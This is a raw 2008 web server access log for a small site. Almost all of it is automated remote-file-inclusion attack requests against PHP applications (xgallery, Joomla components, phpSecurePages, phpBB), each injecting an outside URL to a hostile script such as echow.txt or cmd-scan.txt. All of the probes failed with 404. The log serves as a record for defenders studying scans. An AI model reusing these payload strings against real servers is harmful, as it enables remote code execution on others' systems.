69.93.25.2 - - [03/Feb/2008:16:47:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:47:54 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:47:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:47:54 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:16:48:28 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:16:48:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:16:48:28 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:48:42 -0800] "GET /logs/phprojekt/lib/lib.inc.php?path_pre=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:48:46 -0800] "GET /phprojekt/lib/lib.inc.php?path_pre=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
211.115.89.60 - - [03/Feb/2008:16:49:38 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.89.60 - - [03/Feb/2008:16:49:39 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.89.60 - - [03/Feb/2008:16:49:40 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:49:53 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:49:57 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:50:21 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:50:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:50:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.244.50 - - [03/Feb/2008:16:50:43 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.244.50 - - [03/Feb/2008:16:50:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.244.50 - - [03/Feb/2008:16:50:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:51:02 -0800] "GET /logs/scripts.log/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:51:03 -0800] "GET /index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:51:03 -0800] "GET /logs/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:52:04 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:52:04 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:52:04 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:16:52:28 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:16:52:28 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:53:18 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:53:18 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:53:18 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:53:19 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.204.37.199 - - [03/Feb/2008:16:53:29 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.204.37.199 - - [03/Feb/2008:16:53:30 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.50.244.153 - - [03/Feb/2008:16:53:50 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.25.2 - - [03/Feb/2008:16:54:18 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:55:59 -0800] "GET /logs/access.log/config.inc.php?path_escape=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:56:00 -0800] "GET /logs/access.log/config.inc.php?path_escape=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:56:00 -0800] "GET /logs/config.inc.php?path_escape=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:56:01 -0800] "GET /logs/config.inc.php?path_escape=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:56:07 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:56:08 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:56:08 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:16:56:21 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:16:59:53 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.10.6.66 - - [03/Feb/2008:17:00:23 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.71.208.150 - - [03/Feb/2008:17:00:24 -0800] "GET /logs/access_080114.log////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:17:01:02 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:17:01:02 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:02:06 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:02:06 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:02:07 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.15.194.246 - - [03/Feb/2008:17:04:58 -0800] "GET //includes/functions_kb.php?phpbb_root_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:17:06:43 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:17:07:11 -0800] "GET /logs/scripts.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:17:07:11 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:17:07:12 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.44.107 - - [03/Feb/2008:17:08:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.82 - - [03/Feb/2008:17:08:02 -0800] "GET /logs/access.log HTTP/1.0" 200 39310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.30.216.91 - - [03/Feb/2008:17:08:05 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:17:08:22 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:09:29 -0800] "GET /logs/scripts.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:09:29 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:09:30 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:09:41 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:09:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:09:41 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
88.204.37.199 - - [03/Feb/2008:17:09:43 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:17:10:52 -0800] "GET /logs/access_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:12:25 -0800] "GET /logs/scripts.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:12:25 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:12:25 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.35.191.126 - - [03/Feb/2008:17:12:44 -0800] "GET /logs/index.php?body=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.126 - - [03/Feb/2008:17:12:45 -0800] "GET /index.php?body=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
88.204.37.199 - - [03/Feb/2008:17:13:41 -0800] "GET /logs/access_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:14:01 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:14:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:14:02 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:16:01 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:16:02 -0800] "GET //appserv/main.php?appserv_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:16:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
125.46.36.186 - - [03/Feb/2008:17:17:19 -0800] "GET /logs/access.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:17:17:22 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:18:31 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:18:31 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:18:32 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:17:18:58 -0800] "GET /logs/access_080107.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:17:19:36 -0800] "GET /logs/access_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:20:01 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:20:21 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:20:21 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:17:20:21 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:20:48 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:20:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:20:48 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
68.157.122.154 - - [03/Feb/2008:17:23:08 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
75.0.141.110 - - [03/Feb/2008:17:23:25 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
201.251.124.206 - - [03/Feb/2008:17:23:32 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:17:23:41 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:17:23:42 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:17:23:42 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.161.218 - - [03/Feb/2008:17:25:03 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
